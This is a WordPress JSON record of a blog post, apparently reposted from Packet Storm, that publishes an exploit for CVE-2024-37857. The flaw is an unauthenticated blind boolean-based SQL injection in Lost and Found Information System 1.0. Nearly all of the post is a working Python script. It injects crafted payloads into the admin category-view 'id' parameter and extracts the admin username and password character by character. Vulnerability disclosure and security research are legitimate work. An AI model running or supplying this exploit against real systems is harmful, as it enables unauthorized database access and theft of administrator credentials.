{"id":57471,"date":"2024-06-13T17:31:24","date_gmt":"2024-06-13T14:31:24","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/179080\/CVE-2024-37857.py.txt"},"modified":"2024-06-13T17:31:24","modified_gmt":"2024-06-13T14:31:24","slug":"lost-and-found-information-system-1-0-sql-injection","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/lost-and-found-information-system-1-0-sql-injection\/","title":{"rendered":"Lost And Found Information System 1.0 SQL Injection"},"content":{"rendered":"<p># Exploit Title: Unauthenticated Blind Boolean-Based SQL Injection Exploit &#8211; Lost and Found Information System <br \/># Exploit Author: Amit Roy (Rezur \/ AR0x7)<br \/># Date: June 07, 2024<br \/># Vendor Homepage: https:\/\/www.sourcecodester.com\/php\/16525\/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html<br \/># Software Link: https:\/\/www.sourcecodester.com\/sites\/default\/files\/download\/oretnom23\/php-lfis.zip<br \/># Tested on: Kali Linux, Apache, Mysql<br \/># Version: v1.0<br \/># Exploit Description:<br \/># Lost and Found Information System v1.0 suffers from an unauthenticated SQL Injection Vulnerability allowing remote attackers to dump the SQL database using a Blind SQL Injection attack.<br \/># CVE : CVE-2024-37857<\/p>\n<p>import requests,string,sys,argparse<\/p>\n<p>r = requests.Session()<br \/>proxies = {&#8216;http&#8217;: &#8216;http:\/\/127.0.0.1:8080&#8217;}<\/p>\n<p>admin_path = &#8220;\/php-lfis\/admin\/index.php&#8221;<br \/>createCategory_path = &#8220;\/php-lfis\/classes\/Master.php&#8221;<\/p>\n<p>def char_extract(rhost, payload):<br \/>params = {&#8220;page&#8221;: &#8220;categories\/view_category&#8221;, &#8220;id&#8221;: payload}<br \/>response = r.get(rhost+admin_path, params=params)<br \/>if &#8220;Category ID is not valid&#8221; not in response.text:<br \/>return True<br \/>else:<br \/>return False<\/p>\n<p>def sqli(rhost, column):<br \/>charset = string.printable<br \/>output_length = 200<br \/>output = &#8220;&#8221;<br \/>for i in range(output_length):<br \/>for char in charset:<br \/># Extracts the credentials of user with id=1, admin by default<br \/>payload = &#8220;13371337&#8242; or char(%s) = (select substring(%s,%s,1) from users where id=1)&#8211; -&#8221; % (ord(str(char)),str(column),str(i+1))<br \/>sys.stdout.write(f&#8221;\\r[*] Extracting: {output}\\r&#8221;)<br \/>if char_extract(rhost, payload):<br \/>output += char<br \/>break<br \/>elif char == &#8216;~&#8217; and not char_extract(rhost, payload):<br \/>print(&#8220;[*] Extracting:&#8221;,output)<br \/>return output<\/p>\n<p>def argsetup():<br \/>about = &#8216;Unauthenticated Blind Boolean-Based SQL Injection Exploit &#8211; Lost and Found Information System (https:\/\/www.sourcecodester.com\/php\/16525\/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html)&#8217;<br \/>parser = argparse.ArgumentParser(description=about)<br \/>parser.add_argument(&#8216;-t&#8217;, &#8216;&#8211;target&#8217;, help=&#8217;Target ip address or hostname. Example : &#8220;http:\/\/localhost&#8221;&#8216;, required=True)<br \/>args = parser.parse_args()<br \/>return args<\/p>\n<p>def main():<br \/>args = argsetup()<br \/>rhost = args.target<br \/>print(sqli(rhost, &#8216;username&#8217;),&#8217;:&#8217;,sqli(rhost, &#8216;password&#8217;))<\/p>\n<p>if __name__ == &#8220;__main__&#8221;:<br \/>main()<\/p>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: Unauthenticated Blind Boolean-Based SQL Injection Exploit &#8211; Lost and Found Information System # Exploit Author: Amit Roy (Rezur \/ AR0x7)# Date: June 07, 2024# Vendor Homepage: https:\/\/www.sourcecodester.com\/php\/16525\/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html# Software Link: https:\/\/www.sourcecodester.com\/sites\/default\/files\/download\/oretnom23\/php-lfis.zip# Tested on: Kali Linux, Apache, Mysql# Version: v1.0# Exploit Description:# Lost and Found Information System v1.0 suffers from an unauthenticated SQL Injection &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-57471","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/57471","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=57471"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/57471\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=57471"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=57471"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=57471"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}